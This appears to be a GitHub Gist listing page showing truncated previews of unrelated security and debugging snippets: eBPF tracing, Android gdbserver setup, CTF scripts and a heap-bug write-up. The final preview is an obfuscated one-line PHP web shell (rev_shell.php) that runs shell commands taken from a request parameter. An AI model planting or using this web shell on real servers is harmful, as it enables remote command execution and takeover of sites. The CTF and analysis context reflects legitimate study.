IDA Plugins | Preferred | Neutral | Unreviewed |
---|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## follow redirects, including rePOSTing, with the requests library. | |
###################################################################### | |
import requests | |
## authentication with no redirects | |
ans = requests.post(url=endp_prod + "/session", data=json.dumps(d), headers=h) | |
## results in a successful login | |
ans.status_code |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
from bcc import BPF | |
from time import sleep | |
# This outputs a count of how many times the clone and execve syscalls have been made | |
# showing the use of an eBPF map (called syscall). | |
program = """ | |
BPF_HASH(syscall); |
adb push ~/android-sdk-linux/ndk-bundle/prebuilt/android-<arch>/gdbserver/gdbserver /data/local/tmp
adb shell "chmod 777 /data/local/tmp/gdbserver"
adb shell "ls -l /data/local/tmp/gdbserver"
adb forward tcp:1337 tcp:1337
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env ruby | |
# elisp, lua, python2, and jvm | |
# https://docs.google.com/spreadsheets/d/1l1N_wtK8xA7N-ezG5iUjDeg6iKQgVaYf8ckTSp30QIo/ | |
$flag = File.read('flag').chomp | |
$ml_preamble = nil | |
$lua_preamble = nil | |
$ruby_preamble = nil |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <stdlib.h> | |
#include <unistd.h> | |
#include <string.h> | |
#include <sys/types.h> | |
#include <sys/stat.h> | |
#include <fcntl.h> | |
#include <sys/mman.h> | |
#include <assert.h> | |
#include <sys/ioctl.h> |
At the beginning, the binary lets you enter 0x20 bytes for your name
. This is stored in the bss section, and it is not null terminated. After this, you get the following menu options:
- Show Name - Shows you your name
- Write Diary - Lets you allocate a page of max 0x80 size. The first four bytes of this page chunk stores the size you choose, and then the rest is the content you enter.
calloc
is used to allocate this chunk. This chunk's pointer is stored in an array immediately after yourname
in the bss section (meaning the name can be aligned to it and you can leak it using option 1). You can have a max of 14 pages. - Read Diary - Lets you pick a page index, and the corresponding page contents is output to you (using
puts
). - Edit Diary - Lets you pick a page index to edit. It will use the size stored in the first 4 bytes of the page chunk to determine how many bytes you can edit. The page index you enter is signed, so there is a bug here (you can enter negative
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`; | |
/* | |
* In terminal: | |
* $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php | |
* This is how the code will be produced, \xa0\xb8\xba\xab will be | |
* treated as constant therefore no " needed. It is also not copyable | |
* string because of non-ascii characters | |
* | |
* Explanation: |